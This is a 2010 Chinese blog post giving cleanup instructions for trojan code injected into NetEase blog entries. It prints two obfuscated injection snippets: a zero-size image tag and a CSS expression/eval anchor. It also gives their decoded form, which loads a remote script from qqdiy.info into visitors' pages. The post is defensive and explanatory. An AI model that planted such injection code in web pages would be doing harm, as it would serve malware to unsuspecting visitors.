注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

逍遥峰.暮雪崖

暮雪江天崖上客,绝尘仙骨剑中诗。

 
 
 

日志

 
 
关于我

江湖,早已融在一壶酒里,慢慢饮下。剑挑襟前雪,香沉明月心,不管寂寞繁华。三千年过往,一抹红尘,谁是我传奇的永恒?绾青丝白发,笑看沧海流沙。

网易考拉推荐

【快剑追魂】博客网页挂马查杀 [二]  

2010-12-27 22:51:23|  分类: 快剑追魂 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

 

 

 

 

 

 博客网页挂马查杀 [二]

 

文/快剑

 

 


        近日,博客网页木马活跃,日志挂马现象比较严重,主要症状为:弹窗、跳页、破坏日志、博客网页速度变慢等。请朋友们排查近期发表的日志,共同维护网络环境。

 

新发现的两种植入日志中的木马代码:

 

1.

 <IMG id=hde title="日志标题 - 博名 - 博客顶栏名字" alt="日志标题 - 博名 - 博客顶栏名字" src="http:///#/" width=0 height=0 e="s%3Ddocument.createElement%28%22script%22%29%3Bs.src%3D%22http%3A//qq%64%69%79.%69%6efo/a/163/x.php%22%3Bs.type%3D%22text/javascript%22%3Bdocument.getElementsByTagName%28%27head%27%29%5B0%5D.appendChild%28s%29%3B%0D%0A">

         这段代码的开头与日志中插入分隔线或图片的代码结构非常相似,src="http:///#/" width=0 height=0是最明显的标志,在可视编辑状态下,植入代码的位置对应着一个类似“.....”的微小图片,因width=0 height=0,即宽=0 高=0,所以图片框在编辑时只能显示为一个小点,不易发现。

        这段代码通常不是只出现一段,而是有多个循环,有的达10次以上。查找后将其准确删除,更新日志即可。

 

注:因其与日志内插图或分隔线代码的结构很相似,请仔细核对alt="日志标题 - 博名 - 博客顶栏名字" 之后的 src="http:///#/" width=0 height=0,勿做误删

 

 

 

2.

<A  style="key:ih.baidu.com</A><a style="" w></a><a style="key=m;e:expre/***/ssion(function(){if(!window.xx){ev/***/al(unescape('s%3Ddocument.createElement%28%22script%22%29%3Bs.src%3D%22http%3A//qq%64%69%79.%69%6efo/a/163/x.php%22%3Bs.type%3D%22text/jav%61%73cript%22%3Bdocument.getElemen<wbr>tsByTagName%28%27head%27%29%5B0%5D.appendChild%28s%29%3B%0D%0A'));window.xx=1}}(this));""></a>

          这是一段被植入的连接代码,可能单独植入,也可能与1.的代码同时植入。在<>编辑状态下,代码开头的<A  style="key:ih.baidu.com</A><a style="" w></a><a style="key=m;e:expre/***/ssion(function(){if(!window.xx)可以很明显的查找出来。

         准确删除,更新日志即可。

 

 

快剑   2010年12月27日

 

 

       代码2.存在于日志的数量远远超过代码1.,很多的日志中感染着第2段代码。看长相这两段代码都经过加密,无法解读其真实面目和具体的危害性。今天应用JavaScript的UnEscape函数对其解密,得到如下代码:

1.

<img title="" alt="" src="http:///#/"  width="0" height="0" e="s%3Ddocument.createElement%28%22script%22%29%3Bs.src%3D%22http%3A//qq%64%69%79.%69%6efo/a/163/x.php%22%3Bs.type%3D%22text/javas<wbr>cript%22%3Bdocument.getElemen<wbr>tsByTagName%28%27head%27%29%5B0%5D.appendChild%28s%29%3B%0D%0A" >

解密后为:

 <img title="" alt="" src="http:///#/"  width="0" height="0" e="s=document.createElement("script");s.src="http://qqdiy.info/a/163/x.php";
s.type="text/javas<wbr>cript";document.getElemen<wbr>tsByTagName('head')[0].appendChild(s);
" >

 

 2.

<A  style="key:ih.baidu.com</A><a style="" w></a><a style="key=m;e:expre/***/ssion(function(){if(!window.xx){ev/***/al(unescape('s%3Ddocument.createElement%28%22script%22%29%3Bs.src%3D%22http%3A//qq%64%69%79.%69%6efo/a/163/x.php%22%3Bs.type%3D%22text/jav%61%73cript%22%3Bdocument.getElemen<wbr>tsByTagName%28%27head%27%29%5B0%5D.appendChild%28s%29%3B%0D%0A'));window.xx=1}}(this));""></a>

解密后为:

 <A  style="key:ih.baidu.com</A><a style="" w></a><a style="key=m;e:expre/***/ssion(function(){if(!window.xx){ev/***/al(unescape('s=document.createElement("script");s.src=http://qqdiy.info/a/163/x.php;
s.type="text/javascript";document.getElemen<wbr>tsByTagName('head')[0].appendChild(s);
'));window.xx=1}}(this));""></a>

 

 

  

 2010年12月28日

 

 


 

其它挂马症状及查杀方法:

博客网页挂马查杀[一] 

 

 

 

 

 

  评论这张
 
阅读(243)| 评论(7)
推荐 转载

历史上的今天

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017